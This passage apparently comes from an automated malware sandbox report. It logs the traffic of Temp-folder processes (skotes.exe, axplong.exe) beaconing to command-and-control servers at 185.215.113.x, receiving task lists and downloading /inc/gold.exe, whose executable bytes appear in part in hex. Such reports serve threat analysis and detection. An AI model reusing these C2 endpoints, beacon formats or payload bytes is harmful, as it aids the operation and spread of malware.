                                                      Sep 24, 2024 15:34:40.910768032 CEST1236INData Raw: af 42 b8 bb 62 fd 5c 23 de 2a 36 e6 2b 9c dd 01 1b db 7e 62 5c 13 95 0c cf 0d b5 94 d0 e3 91 3b be 2f 25 1b 0e ec db e3 8e e6 e1 92 2c fb 05 53 83 01 02 59 03 50 d5 f5 32 43 d2 34 62 a3 7a 04 d6 6c f8 65 ab 06 c5 11 02 22 bf 0e 99 eb dc d8 5f c7
                                                      Data Ascii: Bb\#*6+~b\;/%,SYP2C4bzle"_4f\qV[43e$vh"t"#$&m~ci3=J'fImv&?M7XzSr]wtzbn1Qn?!]sj;!P8DX^=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.749730185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:45.520745993 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000020001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.749744185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:51.860678911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:34:52.607199907 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0
                                                      Sep 24, 2024 15:34:52.608257055 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 45 34 31 43 46 46 43 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBAE41CFFCFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                                                      Sep 24, 2024 15:34:52.890269041 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 36 31 66 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 63 32 63 64 30 61 34 61 34 65 62 36 63 66 62 66 32 66 36 62 37 30 34 36 65 66 36 65 31 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 63 35 36 34 34 66 35 39 63 35 62 36 37 65 64 38 32 31 32 66 38 31 35 64 34 32 65 64 30 66 63 66 38 65 63 33 30 65 61 66 65 62 34 62 36 35 32 36 65 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 65 38 66 38 66 62 62 66 34 39 35 34 65 61 65 31 36 30 37 32 [TRUNCATED]
                                                      Data Ascii: 61f <c>1000002001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cfbf2f6b7046ef6e1#1000004001+++aa0ed36554e19fbffc5644f59c5b67ed8212f815d42ed0fcf8ec30eafeb4b6526e#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000191001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cf2f8ffb74764e0e17f3d77c77b#1000254001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a733f9f3f3a0046ef6e1#1000284001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db349ba2a8fa26b3fcf9b6447ffced653d77c77b#1000285001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a771b2f8e2b6#1000287001+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2dd0a9a5ea31f9b2e9a3467ce1f330273cda6696#1000290001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cffefe3a35e6eeaaa636b77#1000308001+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2bcfe2b9fc26fdf0b5a14b65eaeb6b3d77c77b#1000314001+++aa0ed36554e19fbf [TRUNCATED]
                                                      Sep 24, 2024 15:34:52.890572071 CEST522INData Raw: 65 34 62 34 38 62 63 62 36 33 34 32 31 32 30 38 64 33 30 39 36 34 32 64 39 23 31 30 30 30 33 31 38 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 31 35 35 34 34 66 30 39 38 34 33 37 64 65 62 39 64 31 36 65 36 31 30 63 32 37
                                                      Data Ascii: e4b48bcb63421208d309642d9#1000318001+++aa0ed36554e19fbff15544f098437deb9d16e610c2769ea1affb22b3abacb64e33b8e6632325887c91658deb27b987ac#1000321001+++aa0ed36554e19fbff55144f59e5d67ee8710f816dc2ad08ba3e426efb2a8fd4f73eb#1000322001+++aa0ed36554e1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.749745185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:52.188354015 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:34:52.898813009 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.749746185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:53.062340975 CEST53OUTGET /inc/gold.exe HTTP/1.1
                                                      Host: 185.215.113.117


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.749747185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:54.503959894 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.749748185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:56.902508020 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.749749185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:58.131530046 CEST53OUTGET /inc/gold.exe HTTP/1.1
                                                      Host: 185.215.113.117


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.749750185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:58.424093008 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:34:59.131524086 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:59 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.749751185.215.113.37801964C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:58.865786076 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.749752185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:00.938858986 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.749753185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:02.520486116 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:35:03.238173008 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.749754185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:03.208039999 CEST53OUTGET /inc/gold.exe HTTP/1.1
                                                      Host: 185.215.113.117
                                                      Sep 24, 2024 15:35:03.919434071 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:03 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 320000
                                                      Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e1ea94-4e200"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgf^ @ @`K H.textd `.rsrc@@.reloc @B@Hhp>I=NWS(`}CP?2hl<AICN/uT@$0r"_8)LsYQ%/?L7e&[z*j.8Jsn=O|ngUDGHKRT1LzF^ly{JB|`oH3VNf}J/?4nES3ArMqf{!IU/M?>0eXfiUi`wfaLwiVMi4iJps])l0i$|s+?^(b|zcbN
                                                      Sep 24, 2024 15:35:03.921142101 CEST224INData Raw: 88 b1 dc ef f0 76 b5 64 47 e8 65 a9 a0 5d ee 20 8b ec 22 f8 3c 78 f6 6e d5 01 ce 68 5b a3 59 2f 98 59 39 17 21 3f ef a1 db a2 cc 74 92 35 fb 06 c6 05 c6 83 13 74 92 ec ad ea 79 e5 ff 43 ef 55 2b c3 bd ac aa 7d 05 4a c9 48 a6 4b 12 bb 2c 7a 2e c7
                                                      Data Ascii: vdGe] "<xnh[Y/Y9!?t5tyCU+}JHK,z.rP!GG9tAx;2\s]4"MS%0[\|hY::Uw_5H|zC+1J/z*Yo37`y9H%CA
                                                      Sep 24, 2024 15:35:03.921154022 CEST1236INData Raw: 7f a3 4c 75 3d 3e 46 54 1f 58 f6 c0 60 45 67 28 1c 7c 44 de 2a 73 b8 85 7d 2d 20 e1 a1 1a 4b 19 a4 0d 1d 58 cb 7a 21 bf 32 59 00 26 ae b6 af 0d ff 71 aa 6f b3 8f a1 63 37 e4 b9 e5 08 67 07 bb 5c 8e 33 c4 92 61 fb ea ad 64 43 fa 2b 1b 28 35 6b d7
                                                      Data Ascii: Lu=>FTX`Eg(|D*s}- KXz!2Y&qoc7g\3adC+(5kBXjd#`vIPHB7&:r^}NG?rz:B%{J{m]u1}_X\*Cq/{"G4pdVtGuy9NV
                                                      Sep 24, 2024 15:35:03.924150944 CEST1236INData Raw: d6 13 7b 10 49 ff 4d e6 d6 14 1e 6c 24 0e 67 75 d2 2b cb 92 23 79 8e ca e5 6e 93 5b 44 2d ec 07 27 d6 4f a6 75 0a 2d 80 6c a9 0f 0e 99 10 00 aa 7f f8 4b 5d c0 61 ab da 85 74 02 1e 27 b6 47 c2 84 5d b4 e8 12 d2 ac f8 d3 ba 0d 79 b8 d9 50 7a 7d 90
                                                      Data Ascii: {IMl$gu+#yn[D-'Ou-lK]at'G]yPz},Wm[1'I(KhJ[fC#leEM:YJ6v5v&gtgdW:@By9.Fc|q'JecIuTA`w6Fu*a}@+W:~e
                                                      Sep 24, 2024 15:35:03.924170971 CEST448INData Raw: 0d 9e 2b 14 b6 e6 34 42 f6 5b d0 41 ff d0 f2 ae d9 eb 17 a4 f5 cd 6d 4e 81 ab 4b dd 29 12 0d 3e 7d 36 a6 58 10 b9 7a 05 20 3d 73 a1 cf f2 7f 72 33 59 c4 dc 19 e2 f6 c8 7d 21 a6 ff ad 40 9f 70 8f a4 1c d5 46 51 45 19 61 9d 7d 16 74 03 14 79 32 7d
                                                      Data Ascii: +4B[AmNK)>}6Xz =sr3Y}!@pFQEa}ty2}{O@2j}e0(n~2:d&}>4Ypa'!>z@?'JHIa;qk?qif<g$D{kb|*SLtKA=s%Owo4
                                                      Sep 24, 2024 15:35:03.924176931 CEST1236INData Raw: 25 3d d8 d9 e6 0f db 1e 07 f7 20 ef 3b c2 01 60 ed a8 79 00 d4 30 fb 0c 69 5b 2f 70 57 13 3a b1 fc a8 2a 2e 06 54 53 1b 3a 52 d5 77 fc 7f 9d 7e 10 76 1f 78 cf 58 e2 b9 4a 90 9f 97 9c a8 57 1f 39 c3 41 ba 8a 19 b1 3c 30 54 c1 7b 5e 44 8e a8 07 13
                                                      Data Ascii: %= ;`y0i[/pW:*.TS:Rw~vxXJW9A<0T{^DgSqN5p^3O/}UF93'7sa[6[<eZa-y#Ls;p4Ee|9<}lU]Ii:_IF>BZLZFhTEZ<Fd
                                                      Sep 24, 2024 15:35:03.925916910 CEST1236INData Raw: d2 49 9e c6 79 85 ab 06 8b 3a 51 85 63 59 6d ee 76 d6 64 99 26 f4 ad 2d 00 83 c3 b6 fb 8a 4e ab d2 3f 54 ed 8a b2 eb d5 22 5c 65 99 b7 c8 33 26 96 bc f3 c7 dd 50 26 24 d8 3e 3f f3 82 46 1d aa 58 2c ed 6f 02 b8 2b c6 6e 53 9c a9 ff 69 e4 88 df e5
                                                      Data Ascii: Iy:QcYmvd&-N?T"\e3&P&$>?FX,o+nSizIN}rE}EhG0a`\Sig?(-pUmAeH]a-Ndg(hg(73\+StT7-!G%Zui-rYrK)'&Qg_
                                                      Sep 24, 2024 15:35:03.925930023 CEST1236INData Raw: 28 a2 66 02 38 6a c7 50 45 eb 50 8a a8 06 ad a0 49 b5 8c d3 07 ac 6f 8b 82 0a 0f ad d4 91 d2 ee 60 5e 4b 52 86 c8 bc 3e f3 10 70 0b 15 dd ff 38 aa a6 c6 dc 87 d5 87 a3 d9 4a 28 e8 aa df 93 6d f0 18 d5 8b c7 27 0c 62 b6 a9 d7 4e 8d 64 d7 9f 89 cd
                                                      Data Ascii: (f8jPEPIo`^KR>p8J(m'bNd.dC^N@BK{m}L33(2){8RXplG3, fWa,H@Y)A7!#]sHo@u7L?Dp-/GBS$2d6
                                                      Sep 24, 2024 15:35:03.925941944 CEST1236INData Raw: aa fd 71 93 d4 c9 bc 1e d1 89 52 c3 44 5f 57 c9 7a a8 55 46 5b a3 72 5d 94 fd dc 72 a1 c6 a7 8b ef da 4e 21 a8 44 03 4c 28 71 a9 41 8f 36 9d ff d4 8e 84 ac aa f6 d7 32 f1 8c e7 08 3d e2 8f d6 a8 2f 03 50 6f 73 4f cd 0b e4 f7 ac 30 c3 98 8c 64 7f
                                                      Data Ascii: qRD_WzUF[r]rN!DL(qA62=/PosO0dnOLoUKT^N2nOOArybzV."z,>/ONMBf]e}N>ss4ux(+o~0Yo:7g83udbk
                                                      Sep 24, 2024 15:35:03.928949118 CEST1236INData Raw: 37 08 2f 33 d6 78 0f 18 67 85 0f dd 05 fe 6d 9a a4 07 92 d6 07 35 a1 ef 8a 24 66 ee 8d 11 63 24 0b 1f b7 85 c2 b6 7f ea bd 28 0b c1 03 25 42 ac ab 06 89 fb 5d 69 59 aa 26 7a 13 55 d9 a8 2a 09 e5 8a 63 d0 af 17 0a 96 fe e4 06 84 dd e2 7e e6 55 f1
                                                      Data Ascii: 7/3xgm5$fc$(%B]iY&zU*c~Uo$Y}qC|8bbgti?B|>J "n%u\isD[4j6C>ot>rTN<g=xZ,zpi~^(4M&K9d4
                                                      Sep 24, 2024 15:35:03.929091930 CEST1236INData Raw: 27 b2 2b 63 5b 05 2f a3 72 8b f9 4e d9 24 93 0c ee bc 61 fc a5 fc 67 18 d2 53 b6 0e f2 df 47 dd db 22 a4 a9 2c b5 9d a4 1e 1b 73 a8 59 39 d3 af 68 fa 68 f4 80 e8 17 c9 3c e4 8d eb fb 9e fc 1f 83 65 76 89 71 0f c9 e3 a1 19 e0 8e e1 7c 79 6e de 4a
                                                      Data Ascii: '+c[/rN$agSG",sY9hh<evq|ynJEv(*Pm="i+{jU(^*S"_$5>p(#'\<bfOeONwT8VOgb;b=ChHjD`A$$\KD,dgz-+Cq


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.749755185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:04.969216108 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.749758185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:05.474767923 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000002001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.749759185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:07.522842884 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.749761185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:09.686435938 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:35:11.151937008 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0
                                                      Sep 24, 2024 15:35:11.152261972 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0
                                                      Sep 24, 2024 15:35:11.152398109 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.749762185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:11.236959934 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
